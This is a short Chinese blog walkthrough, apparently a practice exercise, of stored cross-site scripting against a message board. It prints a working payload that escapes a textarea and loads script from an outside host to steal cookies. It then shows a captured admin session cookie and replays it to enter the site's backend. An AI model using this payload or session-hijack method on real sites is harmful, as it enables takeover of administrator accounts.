Xss跨站脚本 - Y0ung K1ng

首先登录xssaq
2024-06-04T05:56:54.png

之后创建新项目
2024-06-04T05:58:27.png
2024-06-04T05:58:43.png
2024-06-04T05:59:01.png

创建成功后，提取

</tEXtArEa>'"><sCRiPt sRC=//uj.ci/i1w></sCrIpT>

之后打开网址“客户留言板块”
2024-06-04T06:00:25.png
注意两个放入代码的位置

提交信息
2024-06-04T06:01:05.png

之后我们模拟管理员查看留言
2024-06-04T06:01:59.png

返回，查看xssaq平台
2024-06-04T06:06:27.png

得到cookie

ASPSESSIONIDAADCCQSB=GFKPIJNCDOFGBIBPGFFCJINO

之后打开鬼哥浏览器，如图操作
2024-06-04T06:07:42.png

成功进入后台

本文链接：

https://youngking.xyz/index.php/archives/261/